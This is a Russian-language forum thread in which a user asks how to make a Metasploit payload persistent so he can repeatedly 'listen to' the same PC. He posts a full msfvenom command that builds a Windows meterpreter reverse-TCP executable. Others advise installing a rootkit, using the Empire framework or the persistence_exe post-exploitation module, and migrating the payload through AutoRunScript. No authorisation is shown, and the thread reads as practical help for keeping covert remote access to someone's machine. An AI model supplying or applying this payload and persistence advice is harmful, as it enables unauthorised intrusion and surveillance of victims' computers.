• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Как создать payload который будет работать в режиме persistence ?

kravl

Green Team
19.08.2018
54
10
BIT
0
Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый. Как это исправить ?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=хост LPORT=порт -f exe > ~/Payload.exe
 

sudo

Well-known member
24.02.2017
72
81
BIT
0
Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый. Как это исправить ?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=хост LPORT=порт -f exe > ~/Payload.exe
Тут смотря на что фантазии хватит. Например залить руткит или тот же рдесктоп настроить.
 

kravl

Green Team
19.08.2018
54
10
BIT
0
Тут смотря на что фантазии хватит. Например залить руткит или тот же рдесктоп настроить.
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.
 

sudo

Well-known member
24.02.2017
72
81
BIT
0
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.
Ну пробей по модулям что-то типо persistense и всего такого. Или покури empire framework, он вроде как для этих целей.
 
  • Нравится
Реакции: kravl

kravl

Green Team
19.08.2018
54
10
BIT
0
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.
Ну пробей по модулям что-то типо persistense и всего такого. Или покури empire framework, он вроде как для этих целей.

Ок,спасибо. Пойду изучать empire framework.
 

kravl

Green Team
19.08.2018
54
10
BIT
0
Отпишись по итогам как протестишь. Типо как работает и какие подводные.
В конечном итоге я пришел к тому, что мигрирую свою нагрузку в другой процесс через AutoRunScript.
Через команду mirgate не выходило, ибо сразу сессия закрывалась и был Таймаут.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Как вариант используйте модуль: post/windows/manage/persistence_exe
только если у вас нет прав, то используйте USER
 
  • Нравится
Реакции: Underwood

kravl

Green Team
19.08.2018
54
10
BIT
0
В конечном итоге я пришел к тому, что мигрирую свою нагрузку в другой процесс через AutoRunScript.
Через команду mirgate не выходило, ибо сразу сессия закрывалась и был Таймаут.
На сегодняшний день и AutoRunScript перестал работать...
Знает кто решение этой проблемы ?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
На сегодняшний день и AutoRunScript перестал работать...
Знает кто решение этой проблемы ?
я выше указал решение..работает без проблем. причем даже после перезагрузки компа в отношении которого ведется тестирование.
 
  • Нравится
Реакции: kravl

kravl

Green Team
19.08.2018
54
10
BIT
0
я выше указал решение..работает без проблем. причем даже после перезагрузки компа в отношении которого ведется тестирование.
Где именно прописывать данный модуль ?

Где именно прописывать данный модуль ?
Извиняюсь за тупой вопрос я засыпал уже просто, закрывайте тему. Решено.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!